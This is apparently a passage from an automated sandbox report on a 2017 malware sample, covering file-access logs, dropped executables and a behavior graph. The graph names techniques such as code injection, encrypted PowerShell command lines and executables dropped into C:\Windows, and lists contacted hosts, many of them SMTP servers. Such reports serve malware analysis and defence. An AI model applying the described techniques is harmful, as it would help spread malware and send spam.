Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 389575 Sample:   Startdate:  17/10/2017 Architecture:  WINDOWS Score:  100 0reduced Processes exeeded maximum capacity for this level. 2 processes have been hidden. main->0reduced      started     0 wget.exe 1 main->0      started     3 WINWORD.EXE 71 25 main->3      started     10 helphome.exe main->10      started     14 helphome.exe main->14      started     1253reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 38610reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38614reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 1253sig Injects files into Windows application 38610sig Drops executables to the windows directory (C:\Windows) and starts them 38614sig Drops executables to the windows directory (C:\Windows) and starts them 6434reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 38611reducedSig Signatures exceeded maximum capacity for this level. 7 signatures have been hidden. 38615reducedSig Signatures exceeded maximum capacity for this level. 7 signatures have been hidden. 6434sig Encrypted powershell cmdline option found 38611sig Drops executables to the windows directory (C:\Windows) and starts them 38615sig Drops executables to the windows directory (C:\Windows) and starts them 522d1e551242sig Detected TCP or UDP traffic on non-standard ports 522d1e551243sig Detected TCP or UDP traffic on non-standard ports 522d1e551245sig Detected TCP or UDP traffic on non-standard ports 522d1e551249sig Detected TCP or UDP traffic on non-standard ports 522d1e551252sig Detected TCP or UDP traffic on non-standard ports 522d1e551254sig Detected TCP or UDP traffic on non-standard ports 522d1e551255sig Detected TCP or UDP traffic on non-standard ports 522d1e551257sig Detected TCP or UDP traffic on non-standard ports 522d1e551258sig Detected TCP or UDP traffic on non-standard ports 522d1e551260sig Detected TCP or UDP traffic on non-standard ports 522d1e551265sig Detected TCP or UDP traffic on non-standard ports 522d1e551269sig Detected TCP or UDP traffic on non-standard ports 522d1e551273sig Detected TCP or UDP traffic on non-standard ports 522d1e551274sig Detected TCP or UDP traffic on non-standard ports 522d1e551276sig Detected TCP or UDP traffic on non-standard ports 522d1e551279sig Detected TCP or UDP traffic on non-standard ports 522d1e551280sig Detected TCP or UDP traffic on non-standard ports 522d1e551281sig Detected TCP or UDP traffic on non-standard ports 522d1e551284sig Detected TCP or UDP traffic on non-standard ports 522d1e551285sig Detected TCP or UDP traffic on non-standard ports 38617reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38618reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38619reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 6067sig System process connects to network (likely due to code injection or exploit) 38612sig Drops executables to the windows directory (C:\Windows) and starts them 38617sig Drops executables to the windows directory (C:\Windows) and starts them 38618sig Drops executables to the windows directory (C:\Windows) and starts them 38619sig Drops executables to the windows directory (C:\Windows) and starts them 38613sig Drops executables to the windows directory (C:\Windows) and starts them d1e551256 austinfilmschool.org 184.175.109.73, 80 CYBERCON-CYBERCONINCUS United States d1e453740 austinfilmschool.org d1e551236reduced Connected ips exeeded maximum capacity for this level. 67 connected ips have been hidden. d1e551242 smtp.gmail.com 74.125.205.108, 465 GOOGLE-GoogleIncUS United States d1e551242->522d1e551242sig d1e551243 dug-service.de 81.169.145.164, 587 STRATOSTRATOAGDE Germany d1e551243->522d1e551243sig d1e551245 patricia.xoc.tele2net.at 213.90.36.9, 587 UTA-ASAT Austria d1e551245->522d1e551245sig d1e551249 smtpout.secureserver.net 173.201.192.101, 3535 AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS United States d1e551249->522d1e551249sig d1e551252 pop.loomes.net 217.119.50.35, 587 PLUSSERVER-ASDE Germany d1e551252->522d1e551252sig d1e551254 smtp.liwest.at 212.33.55.20, 587 LIWEST-ATLinzAustriaAT Austria d1e551254->522d1e551254sig d1e551255 lb-proxy-16.websupport.sk 37.9.169.18, 587 WEBSUPPORT-SRO-SK-ASSK Slovakia (SLOVAK Republic) d1e551255->522d1e551255sig d1e551257 host4.ssl-gesichert.at 213.145.228.17, 587 DOMAINTECHNIKAT Austria d1e551257->522d1e551257sig d1e551258 zobelei.de 85.13.152.217, 587 NMM-ASD-02742Friedersdorf_Hauptstrasse68DE Germany d1e551258->522d1e551258sig d1e551260 virtual1.mx.freenet.de 195.4.92.211, 587 FREENETDEfreenetDatenkommunikationsGmbHDE Germany d1e551260->522d1e551260sig d1e551265 smtp.live.com 40.101.48.82, 587 MICROSOFT-CORP-MSN-AS-BLOCK-MicrosoftCorporationUS United States d1e551265->522d1e551265sig d1e551269 smtp.world4you.com 81.19.149.200, 587 WORLD4YOUAT Austria d1e551269->522d1e551269sig d1e551273 mailc40.carrierzone.com 64.29.151.235, 587 INFB2-AS-InternetNamesForBusinesscomUS United States d1e551273->522d1e551273sig d1e551274 ssl0.ovh.net 213.186.33.20, 587 OVHFR France d1e551274->522d1e551274sig d1e551276 w00b4087.kasserver.com